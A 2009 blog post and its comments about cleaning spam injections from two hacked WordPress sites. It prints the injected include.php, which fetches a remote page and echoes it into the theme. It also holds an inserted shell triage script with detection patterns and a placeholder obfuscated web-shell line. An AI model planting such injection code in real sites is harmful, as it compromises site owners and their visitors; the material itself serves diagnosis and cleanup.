More on the evil in the woodshed

by Suw on August 31, 2009

CnV is still having spam injection problems. Unfortunately, the upgrades to WordPress and Thesis didn’t solve the problem, and a few days later it was full of spam again. You won’t have noticed because it was hidden, but it would have made the site slow to load and has probably totally screwed my GoogleJuice. I’ve been advised to totally reinstall WordPress, but I’d rather figure out what is going on so that if it happens again I’ll be better placed to deal with it. Blogiculum Vitae has also been compromised but, annoyingly, not in exactly the same way.

Cleaning up CnV
The first thing I did was to look at my footer.php, as from looking at the source of chocolateandvodka.com that’s where the spam links seem to have been injected. I found a line or two of code that shouldn’t have been there. Unfortunately I didn’t keep a copy of what they said, but part of it was a call to an “include.php”. I deleted the bad code, and then searched through all the WP php files until I found include.php. When I opened it, it was clearly calling on code hosted on a third party site, so I deleted it. Again, I wish I’d kept the code, but I didn’t think about it until just now!

Anyway, that didn’t do the trick because I got more crap injected into my header, this time. So I’ve just spent some time trawling through and I found a compromised theme. It’s an old theme that I no longer use, Cold Blue. Originally when I opened the themes folder last time, I found all themes had their permissions set so that nothing could execute, and I didn’t remember those permissions settings being like that last time… but I’m not an expert and I couldn’t remember the permissions from the last time I fiddled with WP.

Currently, they look like this:

[Screenshot: Wordpress hackage]

This is after totally replacing Thesis, and trying to delete Lane-10, another theme I don’t use. I still can’t get rid of the damn Lane-10 folder (or the Cold Blue one either, come to that). Before I changed anything, permissions were set to r-xr-xr-x (read: yes; write: no; execute: yes). (On Blogiculum Vitae, they are set to rwxr-xr-x, which I presume is the right setting.)

Anyway, I opened up Cold Blue and saw:

[Screenshot: Wordpress hackage]

Which doesn’t look too bad, until you take a look in Images:

[Screenshot: Wordpress hackage]

Ewww! Evil!

I have deleted the contents of the theme folder. The other themes look like they have not been compromised. I can’t find any other PHP files that look odd. Time will tell if I’ve cleaned it out or not.

UPDATE: Thanks to everyone who’s commented. ManxStef was correct – the hackers did create an admin account, so I have deleted every account except mine. If you were a subscriber and this has affected you in any way, please accept my apologies.

Sadly, I now have confirmation that my attempt to clean up has not worked – there’s a new spam injection, this time in the header. The code is:

<?php include ("include.php"); ?>

That bit of code was tucked in at the bottom of the header. Just deleting it gets rid of the spam, but there’s got to be something else still lurking in a dark corner that is re-editing my theme files to re-insert that code.

This include.php exists in wp-content/themes/thesis and contains this code:

<?php
// Injected include.php: fetches a remote page and prints it straight into the theme output
set_time_limit(10);
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 7);
curl_setopt($ch, CURLOPT_URL, "http://777-software.com/hearme.html"); // remote source of the spam links
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$RemoteData = curl_exec($ch);
echo $RemoteData; // whatever the remote host serves ends up in the header/footer
curl_close($ch);
?>

And here I officially run out of WordPress expertise and am going to have to call in the big guns.
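As an added example (not the author's code or anything from the post), here is a small POSIX shell triage script that looks for the signs described above: the injected include line, a curl_exec fetch of remote content, PHP files sitting under a theme's images folder, world-writable files, and files changed since a known-good one (the write-permission and encoded-string checks the commenters raise are folded in). It runs read-only against a constructed sample tree; the example.invalid host, the placeholder blob and all paths are made up for the demo.

```shell
# Added example, not code from the original post: a read-only triage scan for the
# signs described above, run here against a constructed sample tree.

# PHP files carrying the markers seen in the injected code: a local include of
# include.php, curl_exec pulling remote content, or the obfuscation functions
# (base64_decode, gzinflate, eval) that usually wrap a dropped web shell.
scan_suspicious_php() {
  find "$1" -type f -name '*.php' 2>/dev/null | while IFS= read -r f; do
    if grep -Eq 'include[[:space:]]*\(?[[:space:]]*.include\.php|curl_exec|base64_decode|gzinflate|eval[[:space:]]*\(' "$f"; then
      printf '%s\n' "$f"
    fi
  done | sort
}

# PHP has no business under a theme's images directory (Cold Blue carried its
# payload in Images).
scan_php_in_images() {
  find "$1/wp-content/themes" -type f -ipath '*/images/*' -iname '*.php' 2>/dev/null | sort
}

# World-writable entries let any other process on a shared host re-edit theme files.
scan_world_writable() {
  find "$1" -perm -0002 2>/dev/null | sort
}

# Files changed since a known-good reference file (e.g. one written by the last
# upgrade) are the first place to look for re-inserted code.
scan_newer_than() {
  find "$1" -type f -newer "$2" 2>/dev/null | sort
}

# Constructed sample tree (not real site data): include.php mirrors the shape of the
# snippet quoted above with a placeholder host; shell.php holds a placeholder blob.
make_sample_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/wp-includes" "$root/wp-content/themes/thesis" \
           "$root/wp-content/themes/coldblue/images"
  printf '<?php $wp_version = "2.8.4";\n' > "$root/wp-includes/version.php"
  touch -t 200908250000 "$root/wp-includes/version.php"   # stand-in for upgrade time
  printf '<?php get_footer(); ?>\n' > "$root/wp-content/themes/thesis/footer.php"
  printf '<?php wp_head(); ?>\n<?php include ("include.php"); ?>\n' \
    > "$root/wp-content/themes/thesis/header.php"
  printf '<?php $ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, "http://example.invalid/hearme.html");\necho curl_exec($ch);\n' \
    > "$root/wp-content/themes/thesis/include.php"
  printf '<?php eval(gzinflate(base64_decode("CONSTRUCTED_PLACEHOLDER_BLOB")));\n' \
    > "$root/wp-content/themes/coldblue/images/shell.php"
  chmod o+w "$root/wp-content/themes/thesis/include.php"
  printf '%s\n' "$root"
}
```

Against a real install, point the scan functions at the WordPress root and use a file from the last clean upgrade as the reference for scan_newer_than; expect some false positives from legitimate plugins that use base64_decode, so read each hit rather than deleting on sight.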

Cleaning up Blogiculum Vitae
Blogiculum Vitae is running WP 2.8.4 and uses the Thesis 1.1 theme.

Again, the footer.php has been compromised, but this time the spam links have been injected directly into it.

[Screenshot: More WordPress hackage]

I have sorted through the files to see if I can see where the compromise is, looking at the dates to see if any stand out, as there shouldn’t be anything new there. I haven’t been able to find anything else that looks out of place, so perhaps it’s been compromised using a different, more direct method. Time to upgrade WordPress and Thesis!

If anyone has any more information on this, I’d be most grateful if you could leave a comment. I’m not sure if I’ve solved the problem or just slowed it down a bit. And if you see any spam URLs in the source code of the page, please let me know.

UPDATE: Although the CnV compromise is ongoing, Blogiculum Vitae seems to still be clean. I am thankful for small mercies!

ManxStef August 31, 2009 at 10:08 pm

I’ve seen a few exploits like this before, though with earlier versions. (Wasn’t Magic Include Shell, was it?) The attack vector can be multiple routes: WordPress itself (though if you were already on 2.8.4 this suggests otherwise), a vulnerable theme (usually functions.php) or plugin, another web app such as a forum, etc.

If they’ve compromised things to the point of changing permissions of directories so you can no longer access them then you’ll most likely need root on the webserver to clean this up, otherwise they may have code in these directories to re-infect whatever you upload. If not, do make sure whatever you upload isn’t world-writable, i.e. the ‘other’ permissions, and ideally remove group write from all the files you don’t need to edit, too.

It’s also possible that they’ve created entries in the database itself, so do go through that and check if you can – they may have at the very least created a new admin account to get back in.

There’s some good advice on the WordPress Codex about hardening, once you’ve secured it again:
http://codex.wordpress.org/Hardening_WordPress

and BlogSecurity.net:
http://blogsecurity.net/wordpress/wordpress-security-whitepaper

ManxStef August 31, 2009 at 10:10 pm

Oh, forgot to mention, if you’ve not signed up for the Google Webmaster Tools it’s a good way of getting a warning that your site’s been compromised:
https://www.google.com/webmasters/tools/

Make sure you add your e-mail address to the panel and it should notify you of anything untoward.

Suw August 31, 2009 at 10:35 pm

Hi ManxStef! Thank you so much for the advice and the links. I did indeed have a compromised admin account on CnV, which is now gone, along with *all* subscribers. There was no compromised admin account on Blogiculum Vitae.

Regarding the versions, the compromise of CnV was done before I upgraded it to the newest version, so after the upgrade I would imagine the continued compromises were just extensions of the first.

The permissions thing was not that I couldn’t access them, but that they didn’t have the right permissions. I’ve gone through every Wordpress folder and checked for suspicious looking stuff, but to be honest I’m not familiar enough with Wordpress to know necessarily at a glance what I’m looking for.

And finally, I have no idea how to inspect the database, so if it comes to that I’m going to have to export my content and do a fresh installation.

ManxStef August 31, 2009 at 10:47 pm

Ah, gotcha. Yeah, good idea to nuke all the users that aren’t yours, if only ’cause there were some privilege-escalation exploits previously that allowed a standard user to get admin access.

I’d be happy to take a look through the DB if you can export it? (wp-db-backup may be the easiest way, though through a MySQL tool such as Sequel Pro or a web-based app like phpMyAdmin will do it, too.) Might also be an idea to diff it all against the latest WordPress source, though if you upgraded and overwrote everything then it should be fine.

It’s somewhat reassuring that it happened to an older version of WordPress rather than the latest, as that would’ve pointed at a potential new exploit – not that this helps with your cleanup! Perms shouldn’t be too much of an issue if everything’s read-only by default (with the exception of wp-content/cache and wp-content/uploads, I’m guessing).

Oh yeah, if you can change the password of the MySQL database user (as per the Twitter mention) that’d be an idea. If it’s an automated hack it’s possible they’ve not got it, but they’ll have had access to it so it’s better to be safe.

nicholas butler September 1, 2009 at 7:43 am

Suw

I sorted this out for Mike last year. There will be a compromised theme file and very likely a compromised theme file in the wp-admin directory. The file contains a script that acts like an FTP server presenting the user with a form that allows them to send and receive files from your site. In turn this gives them the access they are looking for.

What I did was the following.

1. Get a clean copy of my theme, note I double-checked the theme looking for the string of text called uuencode, or gzip or base_decode64 because the secret rubbish string for the file was hidden in that long string of gibberish.

2. copy down the wp-config and wp-content files

3. test wp-content directory for the above

4. login to wp-admin and remove unwanted users, remove unwanted posts and unwanted pages and remove the user admin in favour of another user account.

5. On my Webghost control panel set the path to your website to a new path and install wordpress there then copy up wp-config and wp-content

6. Add some security plugins notably, admin IP Watch, wordpress-security

If you’re having any trouble with any of these steps then let me know.

Nik

Matt Wardman September 1, 2009 at 10:29 am

Ouch.

I had a couple of exploits last year. I ended up starting from scratch in a new server account. That is now my standard approach. Create new account -> reinstall -> redirect domain. Painful but it does not need repeating.

Best of luck.

Matt

Matt September 7, 2009 at 5:06 pm

It is painful to clean up after a hack. It sounds like their attack vector isn’t WordPress anymore. (It could even be another user on the same server.) Sounds like you’re in good hands with Mike Little (one of the top WP people in the world) but if you run into any more roadblocks don’t be shy about dropping me a line and we’ll try to help you.

Suw September 7, 2009 at 6:14 pm

I’m pretty sure that the attack vector was Wordpress and that my upgrade to WP and Thesis and my cleaning-up attempts simply failed to remove all the malicious code. It then re-inserted its spam again.

Mike did an amazing job of cleaning things up. I have more details from him that I need to post, just to round up the story. But thanks for the offer of help! It’s much appreciated. The only thing that’s left to do now is to re-establish my non-spammy credentials with Google, which has dropped my blogs from its search results. 🙁

Carl Morris September 11, 2009 at 3:56 pm

Suw, this Matt Cutts post about reconsideration on Google might help.

BTW, I’m getting a PHP error in your footer.php now, it might be related to this problem or the fix.

Suw September 11, 2009 at 5:36 pm

Carl, I’ve signed up with Google’s Webmaster tools and submitted CnV for reconsideration so hopefully that will do the trick. Will replace the footer.php file on CnV. It probably just got borked in my attempted clean up.
